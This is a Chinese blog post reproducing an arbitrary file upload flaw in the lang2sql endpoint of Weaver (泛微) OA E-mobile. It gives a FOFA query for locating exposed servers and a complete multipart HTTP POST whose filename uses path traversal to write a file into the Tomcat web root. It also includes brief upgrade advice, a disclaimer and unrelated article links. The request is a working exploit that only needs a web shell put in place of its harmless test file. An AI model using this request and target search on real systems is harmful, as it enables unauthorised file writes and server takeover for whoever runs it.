泛微OA_lang2sql 任意文件上传漏洞复现

简介

泛微OA E-mobile系统 lang2sql接口存在任意文件上传漏洞,由于后端源码中没有对文件没有校验,导致任意文件上传。攻击者可利用该参数构造恶意数据包进行上传漏洞攻击。

漏洞复现

FOFA语法:

title="移动管理平台-企业管理"

页面访问如下:

影响的版本偏系统版本比较老一点的系统

POC:

/emp/lang2sql?client_type=1&lang_tag=1

拼接URL进行访问,不存在该文件可能返回404页面

该文件若存在可尝试进行利用验证

访问该文件存在页面如上

漏洞验证:

POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1

Host: IP

User-Agent: Mozilla

Accept: text/html

Connection: close

Upgrade-Insecure-Requests: 1

Content-Length: 205

Content-Type: multipart/form-data;boundary=----test

------test

Content-Disposition: form-data; name="file"; filename="../../../../appsvr/tomcat/webapps/ROOT/test.txt"

1234

------test--

尝试访问:

http://ip:port/text.txt

文件上传成功

修复建议

  • 厂商已提供漏洞修补方案

  • 升级至新版本

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习交流使用,如若非法他用,与平台和本文作者无关,需自行负责!


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

相关推荐
One_Blanks4 分钟前
渗透测试-Linux基础(1)
linux·运维·安全
易云码24 分钟前
信息安全建设方案,网络安全等保测评方案,等保技术解决方案,等保总体实施方案(Word原件)
数据库·物联网·安全·web安全·低代码
Qspace丨轻空间41 分钟前
气膜场馆:推动体育文化旅游创新发展的关键力量—轻空间
大数据·人工智能·安全·生活·娱乐
Suckerbin3 小时前
Hms?: 1渗透测试
学习·安全·网络安全
Diamond技术流3 小时前
从0开始学习Linux——网络配置
linux·运维·网络·学习·安全·centos
Spring_java_gg3 小时前
如何抵御 Linux 服务器黑客威胁和攻击
linux·服务器·网络·安全·web安全
newxtc4 小时前
【国内中间件厂商排名及四大中间件对比分析】
安全·web安全·网络安全·中间件·行为验证·国产中间件
weixin_442643425 小时前
推荐FileLink数据跨网摆渡系统 — 安全、高效的数据传输解决方案
服务器·网络·安全·filelink数据摆渡系统
星尘安全6 小时前
安全工程师入侵加密货币交易所获罪
安全·区块链·漏洞·加密货币
newxtc8 小时前
【支付行业-支付系统架构及总结】
安全·支付宝·第三方支付·风控系统·财付通